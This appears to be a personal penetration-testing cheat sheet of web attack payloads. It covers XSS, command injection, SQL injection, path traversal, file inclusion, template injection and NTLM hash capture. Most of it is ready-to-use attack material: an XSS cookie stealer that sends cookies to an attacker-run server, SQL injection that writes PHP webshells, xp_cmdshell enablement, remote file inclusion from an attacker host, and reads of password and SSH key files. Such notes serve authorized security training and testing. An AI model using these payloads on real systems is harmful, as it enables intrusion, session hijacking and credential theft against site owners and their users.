Other Pages

Before exploitating

Always check for already existing exploits. Even if the application seems to be custom made.

Check for unnecessary enters and spaces during payload creations. Use repeater with this button pressed:

Cross Site Scripting

The most frequently used character to test for XSS injection:

HTML

< > " '

JavaScript

' " { } ;

Default payload

<script>alert(document.domain)</script>

Img payload

<img src onerror=alert(document.domain)>

XSS Cookie Stealer

Attacker side

python3 -m http.server 8888

<script>window.location.replace("http://IP:8888/a"+document.cookie);</script>

<img src onerror=window.location.replace("http://IP:8888/a"+document.cookie);>

Payload encoding

Compress the JavaScript code with JSCompress.

https://jscompress.com

Convert it into CharCode using the following JavaScript code:

function encode_to_javascript(string) {
            var input = string
            var output = '';
            for(pos = 0; pos < input.length; pos++) {
                output += input.charCodeAt(pos);
                if(pos != (input.length - 1)) {
                    output += ",";
                }
            }
            return output;
        }
        
let encoded = encode_to_javascript('insert_minified_javascript')
console.log(encoded)

Execute the encoded payload:

<script>eval(String.fromCharCode(<OUTPUT_FROM_ENCODING>))</script>

Command Injection

Do not forget to use urlencoding

Reflected

& echo test123 &

Blind

& ping -c 10 127.0.0.1 &

Blind (ping rce listener)

Kali:

tcpdump -i <NETWORK_CARD> icmp

Victim:

& ping <KALI_IP> &

BLIND OAST

& nslookup collaborator-link.net &

Blind redirecting the input

& whoami > /var/www/static/whoami.txt &

Command seperators

&
&&
|
||

More command seperators

Newline (0x0a or \n)
;

Inline Command Execution (Linux)

`command`
$(command)

Check if command is executed via cmd or powershell

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

Vulnerable Software Exploits

Google: [software name with version] exploit github

SQL Injection

Types of SQL Injection

Exploiting SQL Injection

Fuzz String

'+!@#$

Most of the time SQL Injections differ from the regular ones. Do not paste payloads thoughtlessly - match them to your specific case.

IN-BAND

STACKED QUERIES

SELECT * FROM BOOKS WHERE ID1; DELETE FROM PRODUCTS;

---

UNION Keyword

• It has to contain same amount of columns as the original query.

• The data types need to be compatible between each column.

• You can try to cast string as int e.g. in PostgreSQL

Determine number of columns with order by (increase the number until it fails):

' ORDER BY 1-- //

Sample final query:

If application does not return the output from given command it can me data type mismatch try to change the place of executed command.

%' UNION SELECT database(), user(), @@version, null, null -- //

Dumping other tables example

' UNION SELECT null, username, password, description, null FROM users -- //

---

IN KEYWORD

' or 1=1 in (SELECT password FROM users) -- //

BLIND

BOOLEAN BASED

If outputs of the payloads differ application is probably vulnerable to SQL Injection.

Payload 1:

admin' AND 1=1 -- //

Payload 2:

admin' AND 1=2 -- //

---

TIME BASED

Change response times to avoid false positives.

admin' AND IF (1=1, sleep(3),'false') -- //

Useful SQL commands

MySQL

mysql -u <USER> -p'<PASSWORD>' -h <IP> -P <PORT> # database connection

select version(); // show database version
select system_user(); // show current database user
show databases; // show databases
SELECT user, authentication_string FROM mysql.user WHERE user = '<USER>'; // users password

MSSQL

Additional info about hidden system tables in MSSQL:

https://www.geeksforgeeks.org/system-tables-in-sql/

impacket-mssqlclient <USER>:<PASSWORD>@<IP> -windows-auth

SELECT @@version; // show database version
SELECT name FROM sys.databases; // show databases
SELECT * FROM <DATABASE>.information_schema.tables; // show tables

Manual Code Execution

MySQL

Common locations: ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www')

INTO OUTFILE

In some cases you can spawn the webshell using SQL Injection.

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

MSSQL

You can try to turn on xp_cmdshell using oneliner ; EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- -

If xp_cmdshell is set to True we are able to execute shell commands on the system.

EXECUTE xp_cmdshell 'whoami';

MSSQL Hash grabing

Client:

impacket-smbserver -smb2support share share

Server:

xp_dirtree \\<KALI_IP\share\file

MSSQL dir listing

xp_dirtree "C:\"

File upload

Webshells

File upload bypass

File UploadHackTricks

Null Bytes

%00
0x00

Path Traversal

You can also use path traversal to in file upload funcionality to send ssh key.

It be also found in filename while uploading the file. Url encoding is worth trying. Path traversal is not File Inclusion - it can only read contents of the files.

We can use this to read local files.

Default payloads

Linux

../

Windows

..\

.\/

Encoded payloads

Dot url encoding

%2e%2e/

Url encoding

%2e%2e%2f

%252e%252e%252f

%c0%ae%c0%ae%c0%af

Bypass

....////

PoC files

/etc/passwd

Sometimes choosing a disc does not work on Windows - try also without c:/

C:\Windows\System32\drivers\etc\hosts

Exploitation files

Search also for other types of private key: e.g. id_ecdsa...

Private SSH keys in user's home folder (you can enumerate the users by reading the /etc/passwd file)

/home/<USER>/.ssh/id_rsa

IIS Server log files

C:\inetpub\logs\LogFiles\W3SVC1\

IIS Server config files

C:\inetpub\wwwroot\web.config

File Inclusion

Searching for vulnerability is the same as for Path Traversal

Application include given file (local or remote) in the application running code.

We can use this to execute local or remote files.

Search for this vulnerability in parameters which refers to the another file in the system.

Local File Inclusion

The sever loads a local file.

page=admin.php # example

In order to achieve code execution try to include this line of code in some file on the system:

<?php echo system($_GET['cmd']); ?>

Then include the file with the following parameter (or just urlencode reverse shell):

&cmd=ls

Remote File Inclusion

The file is loaded from a remote server (Best: You can write the code and the server will execute it). In php this is disabled by default (allow_url_include).

# Sample malicious file
<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

python -m http.server 443 # attacker set up http server with malicious file

page=http://<ATTACKER_IP>:443/<MALICIOUS_PHP_FILE>&cmd=ls # example

PHP Wrappers

Instead of executing the files you can read and review its contents using php wrappers.

Read sensitive information (hardcoded credentials, secrets) and understand application logic.

page=php://filter/resource=admin.php # regular

page=php://filter/convert.base64-encode/resource=admin.php # base64 way

echo "<OUTPUT>" | base64 -d # decode the output

Achieve code execution.

page=data://text/plain,<?php%20echo%20system('ls');?>"

WAF / Security Mechanisms bypass (allow_url_include setting needs to be enabled).

page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls

Template Injection

Default Payloads

Common

{{7*7}}

Common

${7*7}

Spring

<%= 7*7 %>

.NET

@(2+2)

For more information visit https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection

Fuzz String

${{<%[%'"}}%\.

Flask Jinja2

{{ ‘’.__class__.__mro__[1].__subclasses__() }}

Filter bypass (newlines in urlencoding)

%0A or %0D or %0D%0A

NTLM Relay

You can inject path to your smb server in order to capture hashes:

//<YOUR_IP>/share